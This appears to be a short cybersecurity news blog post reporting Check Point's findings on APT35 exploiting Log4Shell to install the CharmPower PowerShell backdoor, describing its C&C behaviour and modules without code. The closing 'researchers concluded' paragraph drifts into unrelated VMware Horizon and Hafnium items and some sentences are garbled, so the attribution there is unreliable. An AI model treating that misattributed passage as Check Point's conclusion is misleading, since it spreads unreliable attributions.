Posted on Leave a comment

Iranian Hackers Use A Log4j Vulnerability To Install A Backdoor In PowerShell.

Check point researchers reported that “The actor’s attack setup was  fast, as they employed a basic open-source tool for exploitation and built their activities on existing infrastructure, making the attack easy to detect and attribute,”

The attackers employed one of the publicly accessible open-source JNDI Exploit Kits to exploit the Log4j vulnerability (CVE-2021-44228), which has since been deleted from GitHub due to its great popularity following the vulnerability’s discovery. We will omit the details of the actual exploitation phase because there are several analytical papers that demonstrate how the vulnerability can be exploited.


An Iranian state-sponsored actor has been seen scanning Java apps for the Log4Shell weakness and attempting to exploit it to deploy a previously undocumented PowerShell-based modular backdoor called “CharmPower” for post-exploitation.

According to the Israeli cybersecurity firm, which cited parallels with toolsets previously identified as being used by the threat actor. The attack was related to a group known as APT35, which is also known by the codenames Charming Kitten, Phosphorus, and TA453.

Log4Shell, also known as CVE-2021-44228 (CVSS score: 10.0), is a major security flaw in the popular Log4j logging library that, if exploited successfully, could allow remote execution of arbitrary code on infected systems.

The main module responsible for basic contact with the C&C server and the execution of any modules received is the downloaded PowerShell payload. The following procedures are carried out by the main module:

  • Validate network connection — When the script is run, it makes HTTP POST requests to google.com with the parameter hi=hi to check for an active internet connection.
  • Basic system – The script collects the Windows OS version, computer name, and the contents of a file Ni.txt in the $APPDATA directory; the file is probably produced and filled by different modules that will be downloaded by the main module.
  • Retrieve the C&C domain – The malware decodes the C&C domain obtained from a hardcoded URL hxxps:/s3.amazonaws[.]com/doclibrarysales/3. The backdoor was downloaded from the same S3 bucket as the backdoor.
  • Receiving, decrypting, and carrying out.

CharmPower’s modules also include tools for gathering system information, listing installed applications, taking screenshots, listing running processes, executing commands supplied from the C2 server, and cleaning up any indicators of evidence left behind by these components.

Finally the researchers concluded that,” Microsoft and the NHS have warned that internet-facing systems running VMware Horizon are being targeted for web shells and a ransomware strain known as NightSky, with the latter being linked to a China-based operator known as DEV-0401, which has previously deployed LockFile, AtomSilo, and Rook ransomware. Furthermore, Hafnium, a Chinese threat actor group has been detected exploiting the vulnerability to attack virtualized infrastructure in order to broaden their target.

–-For more Cyber security news in crisp content . Please follow our site via twitter handle @cyberworkx1, Linkedin handle @linkedin

Leave a Reply